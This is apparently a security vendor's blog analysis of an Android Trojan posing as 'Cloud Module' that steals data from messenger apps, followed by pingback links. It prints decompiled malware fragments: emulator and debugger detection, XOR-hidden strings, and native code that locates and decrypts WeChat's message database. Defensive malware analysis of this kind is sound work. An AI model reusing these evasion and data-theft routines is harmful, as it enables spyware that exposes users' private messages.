A Trojan with Hidden Malicious Code Steals User’s Messenger App Information

Trustlook Labs has discovered a Trojan which obfuscates its configuration file and part of its modules. The purpose of the content/file obfuscation is to avoid detection.

The malware has the following characteristics:

  • MD5: ade12f79935edead1cab00b45f9ca996
  • SHA256: 1413330f18c4237bfdc523734fe5bf681698d839327044d5864c9395f2be7fbe
  • Size: 1774802 bytes
  • App name: Cloud Module (in Chinese)
  • Package name: com.android.boxa

The malware uses the anti-emulator and debugger detection techniques to evade dynamic analysis.

public class a {
    public a() {
        super();
        if(!h.a() && (a.b())) {
            String v0 = "emulator\n";
            if(Environment.getExternalStorageState().equals("mounted")) {
                try {
                    File v2 = new File(String.valueOf(Environment.getExternalStorageDirectory().getAbsolutePath()) + "/loge.txt");
                    if(!v2.exists()) {
                        v2.createNewFile();
                    }

                    String v1 = String.valueOf(new SimpleDateFormat("yyyyMMddHHmmss", Locale.CHINA).format(new Date(System.currentTimeMillis()))) + ":";
                    FileOutputStream v3 = new FileOutputStream(v2, true);
                    v3.write(v1.getBytes());
                    v3.write(v0.getBytes());
                    v3.close();
                }
                catch(Exception v0_1) {
                    v0_1.printStackTrace();
                }
            }

            Process.killProcess(Process.myPid());
            System.exit(1);
        }
 []
    private static boolean b() {
        boolean v0_1;
        boolean v1 = false;
        try {
            v0_1 = a.c();
        }
        catch(Exception v0) {
            v0.printStackTrace();
            v0_1 = false;
        }

        if((Debug.isDebuggerConnected()) || (v0_1) || (a.a.b.a()) || (a.a.b.b())) {
            v1 = true;
        }

        return v1;
}
[]
  static {
        b.a = new String[]{"/dev/socket/qemud", "/dev/qemu_pipe"};
        b.b = new String[]{"/sys/qemu_trace", "/system/bin/androVM-prop", "/system/bin/microvirt-prop", "/system/lib/libdroid4x.so", "/system/bin/windroyed", "/system/bin/microvirtd", "/system/bin/nox-prop", "/system/bin/ttVM-prop", "/system/bin/droid4x-prop", "/data/.bluestacks.prop"};
        a[] v0 = new a[]{new a("init.svc.vbox86-setup", null), new a("init.svc.droid4x", null), new a("init.svc.su_kpbs_daemon", null), new a("init.svc.noxd", null), new a("init.svc.ttVM_x86-setup", null), new a("init.svc.xxkmsg", null), new a("init.svc.microvirtd", null), new a("ro.kernel.android.qemud", null), new a("androVM.vbox_dpi", null), new a("androVM.vbox_graph_mode", null), new a("ro.product.manufacturer", "Genymotion"), new a("init.svc.qemud", null), new a("init.svc.qemu-props", null), new a("qemu.hw.mainkeys", null), new a("qemu.sf.fake_camera", null), new a("qemu.sf.lcd_density", null), new a("ro.bootloader", "unknown"), new a("ro.bootmode", "unknown"), new a("ro.hardware", "goldfish"), new a("ro.kernel.android.qemud", null), new a("ro.kernel.qemu.gles", null), new a("ro.kernel.qemu", "1"), new a("ro.product.device", "generic"), new a("ro.product.model", "sdk"), new a("ro.product.name", "sdk"), new a("ro.serialno", null)};
    }

The malware attempts to hide the strings to avoid being detected. For example, the following strings are stored in arrays and are XOR encrypted with 24 to get the real strings:

g.a(new byte[]{117, 97, 80, 119, 107, 108}); //myHost
g.a = g.a(new byte[]{117, 97, 116, 113, 122}); //mylib
g.a(new byte[]{55, 104, 106, 119, 123, 55, 123, 104, 109, 113, 118, 126, 119}); ///proc/cpuinfo
g.a(new byte[]{121, 121, 106, 123, 112, 46, 44}); //aarch64
g.b = g.a(new byte[]{124, 121, 108}); //dat
g.c = g.a(new byte[]{119, 96});ox
g.d = g.a(new byte[]{113, 118, 126, 54, 94, 121, 123, 125, 81, 118, 107, 108, 121, 118, 123, 125}); //inf.FaceInstance
g.e = g.a(new byte[]{54, 114, 121, 106}); // .jar
g.f = g.a(new byte[]{116, 123, 54, 124, 121, 108}); // lc.dat
g.a(new byte[]{124, 125, 122, 109, 127, 54, 108, 96, 108}); // debug.txt
g.g = g.a(new byte[]{109, 118, 113, 118, 107}); //unins

The malware also includes some modules in its Assets folder, and all the modules are encrypted.

image2

For some modules, including “coso”, “dmnso”, “sx”, “sy”, the malware uses the first byte in the module to XOR decrypt the data. For example, take notice of the original module “coso” in the Assets folder:

image4

After decryption, it turns out an ELF module:

image3

The lc.dat is the configuration file, which is XOR decrypted with 137. For example:

image6

After decryption:

image5

The configuration file contains the C&C server and other values that the malware uses to contact its controller. An example request sent by the malware is shown below:

image1

If the Android SDK version is less than 16, the malware loads “sy” module from Assets, otherwise it loads “sx” module. These modules attempt to modify the “/system/etc/install-recovery.sh” file to maintain persistence on the device.

It also has functions to steal the user’s messenger app information. The malware collects information from the following apps:

  • Tencent WeChat
  • Weibo
  • Voxer Walkie Talkie Messenger
  • Telegram Messenger
  • Gruveo Magic Call
  • Twitter
  • Line
  • Coco
  • BeeTalk
  • TalkBox Voice Messenger
  • Viber
  • Momo
  • Facebook Messenger
  • Skype

The following code snippets are used to retrieve data from WeChat:

v4 = a3;
  v5 = a1;
  v13 = a4;
  v6 = a2;
  j_memset(&v16, 0, 0xFFu);
  j_sprintf(&v16, "/data/data/com.tencent.mm/MicroMsg/%s/cdndnsinfo", v6);
  v7 = sub_107A0((int)&v16);
  *v4 = v7;
  if ( !v7 )
  {
    j_strcpy(&v16, "/data/data/com.tencent.mm/shared_prefs/auth_info_key_prefs.xml");
    *v4 = sub_10F98((int)&v16);
  }
  j_memset(&v17, 0, 0x200u);
  j_memset(v15, 0, 0x10u);
  if ( j_strlen(v5) <= 4 )
    j_strcpy(v5, (const char *)&unk_5E688);
  j_sprintf(&v17, "%s%d", v5, *v4, v13);
  v8 = j_strlen(&v17);
  sub_106FC(&v17, v8, (int)v15);
  v9 = 0;
  do
  {
    v10 = (unsigned __int8)v15[v9];
    v11 = v14 + 2 * v9++;
    j_sprintf(v11, "%02x", v10);
  }
  while ( v9 != 16 );
  j_sscanf();
  return 0;
}
[]
j_sprintf(&v102, "/data/data/%s/files/libmmcrypto.so", &unk_5E6BA);
  j_chmod(&v103, 511);
  j_memcpy(&v98, &unk_54E77, 0x21u);
  j_memset(v99, 0, 0xDEu);
  j_strcat(&v98, (const char *)&unk_5E6BA);
[]
  j_strcat(&v98, "/files/%u.sql'");
  j_sprintf(&v109, &v98, &v103, &v102, &v100, v4, &v42, v5, &v109, &v102);
  j_memset(&v104, 0, 0x200u);
  v105 = 1836409902;
  v106 = 112;
  j_memset(&v107, 0, 0x1F8u);
  j_sprintf(&v104, "%s/%u.sql", &unk_5E624, v5);
  j_strcat((char *)&v105, (const char *)&v104);
  j_memcpy(&v94, &unk_54F76, 0x1Cu);
  j_memset(&v95, 0, 0x48u);
  j_memcpy(&v96, &unk_54FDA, 0xDu);
  j_memset(v97, 0, 0x57u);
  j_strcat(&v96, v4);
  j_strcat(&v96, "\";");
  v7 = &v103;
  v8 = &v102;
  v11 = &v94;
  v9 = &v100;
  v12 = &v105;
  v10 = &v96;
  sub_DC64(6, &v7);
  j_chmod(&v104, 511);
  j_memset(&v108, 0, 0x200u);
  j_sprintf(&v108, "%s/sns.db", &unk_5E624);
  sub_E7D0(&v101, &v108);
  j_chmod(&v108, 511);
  j_printf("szsqlite:%s\n", &v103);
  j_printf("szlibmmcrypto:%s\n", &v102);
  j_printf("szDBPath:%s\n", &v100);
  j_printf("szPRAGMAkey:%s\n", &v96);
  return j_printf("sqlDbPath2:%s\n", &v105);
[]
v10 = a1;
  result = j_opendir("/data/data/com.tencent.mm/MicroMsg");
  v2 = result;
  if ( result )
  {
    v9 = 0;
    while ( 1 )
    {
      v4 = j_readdir(v2);
      v5 = v4;
      if ( !v4 )
        break;
      v3 = (const char *)(v4 + 19);
      if ( j_strcmp(".", (const char *)(v4 + 19)) )
      {
        if ( j_strcmp("..", (const char *)(v5 + 19)) )
        {
          if ( sub_E8A0("/data/data/com.tencent.mm/MicroMsg", v5) )
          {
            j_memset(&v13, 0, 0xFFu);
            j_sprintf(&v13, "%s/%s/EnMicroMsg.db", "/data/data/com.tencent.mm/MicroMsg", v3);
            if ( !j_access(&v13, 0) )
            {
              j_memset(&v14, 0, 0xFFu);
              j_sprintf(&v14, "%s/%s", "/data/data/com.tencent.mm/MicroMsg", v3);
[]
              {
                j_strcpy(v10, v3);
                v9 = v8;
              }
            }
          }
        }
      }
}


Summary
Code obfuscation/hiding increases the malware author’s ability to avoid detection and becomes a sophisticated challenge to anti-virus software. Trustlook was able to gather deep insights and knowledge of the malware behavior of this kind of malware. Trustlook’s anti-threat platform can effectively protect users against this invasion.

26 thoughts on “A Trojan with Hidden Malicious Code Steals User’s Messenger App Information

  1. Pingback: Android Trojan Steals Data From Messenger Apps: Facebook, Skype, Twitter Targeted | See Outlook

  2. Pingback: Android Trojan Steals Data From Messenger Apps: Facebook, Skype, Twitter Targeted | TECH and Global NEWS

  3. Pingback: Android Trojan Steals Data From Facebook Messenger, Skype, Other IM Clients – Enterprise Security Professional

  4. Pingback: Android Trojan Steals Data From Facebook Messenger, Skype, Other IM Clients » @FinTechLog

  5. Pingback: Android Trojan Steals Data From Facebook Messenger, Skype, Other IM Clients – News

  6. Pingback: Обнаружен ворующий переписку в мессенджерах вирус — Путешествия

  7. Pingback: Обнаружен ворующий переписку в мессенджерах вирус — prosobak62

  8. Pingback: Il malware Cloud Module ruba dati dai messenger degli smartphone Android

  9. Pingback: Il malware Cloud Module ruba dati dai messenger degli smartphone Android

  10. Pingback: Обнаружен ворующий переписку в мессенджерах вирус

  11. Pingback: Android action updates | Mac Virus

  12. Pingback: April 2nd/3rd 2018 updates | The AVIEN Portal

  13. Pingback: ¡Atención! Sus cuentas en las redes sociales peligran con este nuevo virus – Corrientes Primero

  14. Pingback: Hallan nuevo virus que roba información de las Redes Sociales | MISTERIOS OCULTOS

  15. Pingback: Este troyano de Android puede robar tus datos de Facebook, Messenger y Skype

  16. Pingback: Обнаружили опасный вирус, который "ворует" сообщения с мессенджеров — "Как-то так и назовем"

  17. Pingback: Malware atakujące Androida kradnie nasze rozmowy - Technogadżet

  18. Pingback: Malware Android Baru Ini Mencuri Data Dari Aplikasi Perpesanan - Error 404 Cyber News

  19. Pingback: Telegram і Viber: експерти виявили вірус, який краде листування в месенджерах - Новини дня

  20. Pingback: New Android Trojan Steals Data from Messaging Apps Like Facebook, Twitter And Telegram | Premium Blog! | Development code, Android, Ios anh Tranning IT

  21. Pingback: Android Trojan Steals Info from Messenger, Skype, Twitter & More - OSRadar

  22. Pingback: Cybersec News – April 2018 – My (Yet Another) Cybersecurity Blog

  23. Pingback: นักวิจัยพบ Trojan แอนดรอยด์พันธุ์ใหม่มุ่งขโมยข้อมูล Instant Messenger Client - TechTalkThai

  24. Pingback: Обнаружен вирус, похищающий данные из мессенджеров - SeoLook

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s